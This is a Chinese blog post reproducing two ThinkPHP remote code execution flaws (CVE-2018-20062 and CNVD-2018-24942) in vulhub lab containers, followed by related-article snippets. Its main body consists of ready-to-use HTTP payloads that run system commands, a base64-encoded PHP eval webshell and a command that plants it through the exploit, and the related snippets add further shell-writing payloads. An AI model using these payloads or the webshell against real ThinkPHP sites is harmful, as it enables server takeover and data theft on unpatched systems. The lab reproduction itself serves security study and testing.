Thinkphp漏洞复现

最新推荐文章于 2024-04-02 10:17:09 发布
最新推荐文章于 2024-04-02 10:17:09 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/128321554
版权

Thinkphp简介

Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服 务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很 多基于 thinkphp 开发的网站。

Thinkphp历史漏洞

版本漏洞类型
ThinkPHP3.2.3缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.3最新版update注入漏洞
ThinkPHP3.2.Xfind_select_delete注入
ThinkPHP3.Xorder_by注入漏洞
ThinkPHP5.0.Xsql注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP5SQL注入漏洞&&敏感信息泄露
ThinkPHP5.Xorder_by注入漏洞
ThinkPHP5.X远程代码执行

漏洞复现

Thinkphp5.0.23远程代码执行漏洞(CVE-2018-20062)
漏洞简介

Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞

影响版本:
Thinkphp 5.0.0~ 5.0.23

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5.0.23-rce

docker-compose up -d

访问your-ip:8080/?s=captcha

POST提交:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

代码执行成功

 写入webshell

进入容器:docker exec -it 32736eb79481  /bin/bash  

webshell:<?php @eval ($_POST['cmd']);?>

base64编码后:PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

写入容器:

echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > a.php  

 访问:http://your-ip:8080/?s=captcha

POST提交:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d >cmd.php

蚁剑链接:

执行命令:

ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析(CNVD-2018-24942)

原理:框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。

影响版本:ThinkPHP 5.0.5-5.0.22 || 5.1.0-5.1.30

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5-rce

docker-compose up -d

payload1:

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

payload2:

?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id #命令执行

参考链接:

https://www.cnblogs.com/HelloCTF/p/15748360.html

https://blog.csdn.net/qq_61503377/article/details/125989830?spm=1001.2014.3001.5501

- Time
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
渗透测试之路:ThinkPHP漏洞
m0_68353775的博客
01-10 2240
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
thinkphp漏洞
最新发布
zzf011900的博客
04-02 1200
thinkphp 远程命令执行漏洞php的一个开发框架,5.0.23及以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行。浏览器访问:http://192.168.59.10:8080/index.php?Rce 恶意构迷的语句在服务器(系统)上执行,从而达到黑客控制服务器的目的。浏览器访问:http://192.168.59.10:8080/函数:一串按照顺序和一定逻辑执行的代码。MSF实直接获取权限原理。
【Web】CVE-2021-31805 s2-062漏洞学习
uuzeray的博客
02-13 1240
Struts 2 是一个流行的用于构建 Java Web 应用程序的开源 Web 应用程序框架。它是 Apache 软件基金会下的一个顶级项目,是 Struts 框架的升级版本。Struts 2 通过 MVC(模型-视图-控制器)架构来帮助开发者构建可维护、可扩展的 Web 应用程序。
ThinkPHP历史漏洞
weixin_53747497的博客
03-05 1067
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
Xray-web漏洞扫描工具.zip
02-02
xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有: 检测速度快。发包速度快; 漏洞检测算法高效。 支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以极大的客制化功能。 安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具,内置的所有 payload 和 poc 均为无害化检查。 目前支持的漏洞检测类型包括: XSS漏洞检测 (key: xss) SQL 注入检测 (key: sqldet) 命令/代码注入检测 (key: cmd_injection) 目录枚举 (key: dirscan) 路径穿越检测 (key: path_traversal) XML 实体注入检测 (key: xxe) 文件上传检测 (key: upload) 弱口令检测 (key: brute_force) jsonp 检测 (key: jsonp) ssrf 检测 (key: ssrf) 基线检查 (key: baseline) 任意跳转检测 (key: redirect) CRLF 注入 (key: crlf_injection) Struts2 系列漏洞检测 (高级版,key: struts) Thinkphp系列漏洞检测 (高级版,key: thinkphp) POC 框架 (key: phantasm) 其中 POC 框架默认内置 Github 上贡献的 poc,用户也可以根据需要自行构建 poc 并运行。 设计理念 发最少的包做效果最好的探测。 如果一个请求可以确信漏洞存在,那就发一个请求。如果两种漏洞环境可以用同一个 payload 探测出来,那就 不要拆成两个。 允许一定程度上的误报来换取扫描速度的提升 漏洞检测工具无法面面俱到,在漏报和误报的选择上必然要选择误报。如果在使用中发误报比较严重,可以进行反馈。 尽量不用时间盲注等机制检测漏洞。 时间检测受影响因素太多且不可控,而且可能会影响其他插件的运行。因此除非必要(如 sql)请尽量使用与时间无关的 payload。 尽量不使用盲打平台 如果一个漏洞能用回显检测就用回显检测,因为盲打平台增加了漏洞检测过程的不确定性和杂性。 耗时操作谨慎处理 全局使用 Context 做管理,不会因为某个请求而导致全局卡死。 简易架构 了解 xray 的整体架构可以更好的理解 cli 和配置文件的设置,方便大家更好的使用。 整体来看,扫描器这类工具大致都是由三部分组成: 来源处理 漏洞检测 结果输出 来源处理 这一部分的功能是整个漏洞检测的入口,在 xray 中我们定义了四个入口,分别是 HTTP 被动代理 简易爬虫 单个 URL URL列表的文件 单个原始 HTTP 请求文件 漏洞检测 这一部分是引擎的核心功能,用于处理前面 来源处理 部分产生的标准化的请求。用户可以针对性的启用插件,配置扫描插件的参数,配置 HTTP 相关参数等。 结果输出 漏洞扫描和运行时的状态统称为结果输出,xray 定义了如下几种输出方式: Stdout (屏幕输出, 默认开启) JSON 文件输出 HTML 报告输出 Webhook 输出 使用教程见:xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有: 检测速度快。发包速度快; 漏洞检测算法高效。 支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以极大的客制化功能。 安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具,内置的所有 payload 和 poc 均为无害化检查。 目前支持的漏洞检测类型包括: XSS漏洞检测 (key: xss) SQL 注入检测 (key: sqldet) 命令/代码注入检测 (key: cmd_injection) 目录枚举 (key: dirscan) 路径穿越检测 (key: path_traversal) XML 实体注入检测 (key: xxe) 文件上传检测 (key: upload) 弱口令检测 (key: brute_force) jsonp 检测 (key: jsonp) ssrf 检测 (key: ssrf) 基线检查 (key: baseline) 任意跳转检测 (key: redirect) CRLF 注入 (key: crlf_injection) Struts2 系列漏洞检测 (高级版,key: struts) Thinkphp系列漏洞检测 (高级版,key: thinkphp) POC 框架 (key: phantasm) 其中 POC 框架默认内置 Github 上贡献的 poc,用户也可以根据需要自行构建 poc 并运行。 设计理念 发最少的包做效果最好的探测。 如果一个请求可以确信漏洞存在,那就发一个请求。如果两种漏洞环境可以用同一个 payload 探测出来,那就 不要拆成两个。 允许一定程度上的误报来换取扫描速度的提升 漏洞检测工具无法面面俱到,在漏报和误报的选择上必然要选择误报。如果在使用中发误报比较严重,可以进行反馈。 尽量不用时间盲注等机制检测漏洞。 时间检测受影响因素太多且不可控,而且可能会影响其他插件的运行。因此除非必要(如 sql)请尽量使用与时间无关的 payload。 尽量不使用盲打平台 如果一个漏洞能用回显检测就用回显检测,因为盲打平台增加了漏洞检测过程的不确定性和杂性。 耗时操作谨慎处理 全局使用 Context 做管理,不会因为某个请求而导致全局卡死。 简易架构 了解 xray 的整体架构可以更好的理解 cli 和配置文件的设置,方便大家更好的使用。 整体来看,扫描器这类工具大致都是由三部分组成: 来源处理 漏洞检测 结果输出 来源处理 这一部分的功能是整个漏洞检测的入口,在 xray 中我们定义了四个入口,分别是 HTTP 被动代理 简易爬虫 单个 URL URL列表的文件 单个原始 HTTP 请求文件 漏洞检测 这一部分是引擎的核心功能,用于处理前面 来源处理 部分产生的标准化的请求。用户可以针对性的启用插件,配置扫描插件的参数,配置 HTTP 相关参数等。 结果输出 漏洞扫描和运行时的状态统称为结果输出,xray 定义了如下几种输出方式: Stdout (屏幕输出, 默认开启) JSON 文件输出 HTML 报告输出 Webhook 输出
Think.PHP框架漏洞
m0_71300782的博客
09-13 724
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
ThinkPHP历史漏洞
HAKUNAMATATATTA的博客
12-30 5687
Thinkphp 是一种开源框架。是一个由国人开发的支持windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。
过去一年网络安全的首要威胁是什么?来看看这个报告
jklbnm12的博客
07-13 276
2021年2月,IBM安全团队 X-Force发布了《2021威胁情报指数》,报告显示,漏洞利用成为2020年的首要威胁。 对攻击者来说,寻找和利用网络中未打补丁的问题或常见的漏洞和暴露(CVE)是成功率最高的方法,这也是最常见的获得网络初始访问权的途径。 事实上,漏洞利用的成功率已经超过了钓鱼邮件,在很大程度上取代了凭证窃取,成为攻击者渗透网络的最可靠方法。 状:新漏洞虽多,但旧漏洞威胁更大 X-Force数据显示,Citrix服务器的目录遍历漏洞(CVE-2019-19871)是2020年被利用最多
thinkphp漏洞研究与
Shanfenglan's blog
11-19 1806
文章目录1. Thinkphp5 5.0.22/5.1.291.1 原理1.2 利用2. ThinkPHP5 5.0.232.1 原理2.2 利用参考文章 1. Thinkphp5 5.0.22/5.1.29 1.1 原理 pathinfo模式路由规则为: pathinfo 方式路由 pathinfo:即全路径的访问控制器方法,如:域名/模块/控制器/方法 pathinfo 方式路由示例 // index模块下index控制器index方法 tp5.com/index/index/index 漏洞是由
漏洞ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1220
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
ThinkPHP v5.0.24 完整版
10-22
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和 改进,众多的典型案例确保可以稳定用于商业以及门户级的开发。 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,在项目配置、类 库导入、模版引擎、查询语言、自动验证、视图模型、项目编译、缓存机制、SEO支持、分布式数据库、多数据库连接和切换、认证机制和扩展性方面均有独特的 表。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用。当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单 和快速的特性中受益。ThinkPHP本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
thinkphp 5-rce版本漏洞(超详细版)
精品博客,你值得一看~
08-06 6013
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
Thinkphp5.1.4反序列化漏洞
m0_64348326的博客
05-12 1117
刚好都是被抽象类Model所使用,但由于抽象类无法被new,也就是实例化,所以我们要找一个它的子类,在phpstorm提示有一个继承者。合并的操作,而call_user_func函数取得也是该参数的地址内的值,所以让它作为get传递的参数名即可,直接赋执行命令的值。然后就是合并请求参数,最后返回调用的input方法,可以看到。在类继承时,我直接调用了privot作为实例化对象,并未继承其父类,而是直接将其父类Model的。数组的键名,这两个属性我们都可控,于是可以返回该数组中$name键名对应的键值。
ThinkPHP5系列远程代码执行漏洞(详细)
weixin_53730939的博客
03-20 7462
ThinkPHP5系列远程代码执行漏洞(详细)
Thinkphp5.1.4漏洞
05-11
ThinkPHP 5.1.4 存在一个参数绑定漏洞,攻击者可以通过构造特定的请求,执行任意代码。 以下是漏洞的步骤: 1. 下载 ThinkPHP 5.1.4,创建一个名为 `demo` 的项目。 2. 在 `demo/application/index/controller` 目录下创建一个名为 `Index.php` 的控制器,添加以下代码: ```php <?php namespace app\index\controller; use think\Controller; class Index extends Controller { public function index($name = '') { $this->assign('name', $name); return $this->fetch(); } } ``` 3. 在 `demo/application/index/view` 目录下创建一个名为 `index.html` 的模板文件,添加以下代码: ```html <html> <head> <title>ThinkPHP 5.1.4 Demo</title> </head> <body> <h1>Hello, {$name}!</h1> </body> </html> ``` 4. 启动本地服务器,访问 `http://localhost:8000/index/index`,可以看到页面上显示了 "Hello, !"。 5. 构造以下 payload,并发送 GET 请求: ``` http://localhost:8000/index/index/name/${@phpinfo()}; ``` 注意,这里的 `${}` 是模板引擎的语法,可以在模板中执行 PHP 代码。`@` 符号可以防止 PHP 报错。 6. 页面上将显示 PHPinfo 的信息,说明漏洞已被成功利用。 为了修漏洞,需要将 ThinkPHP 升级到 5.1.5 及以上版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值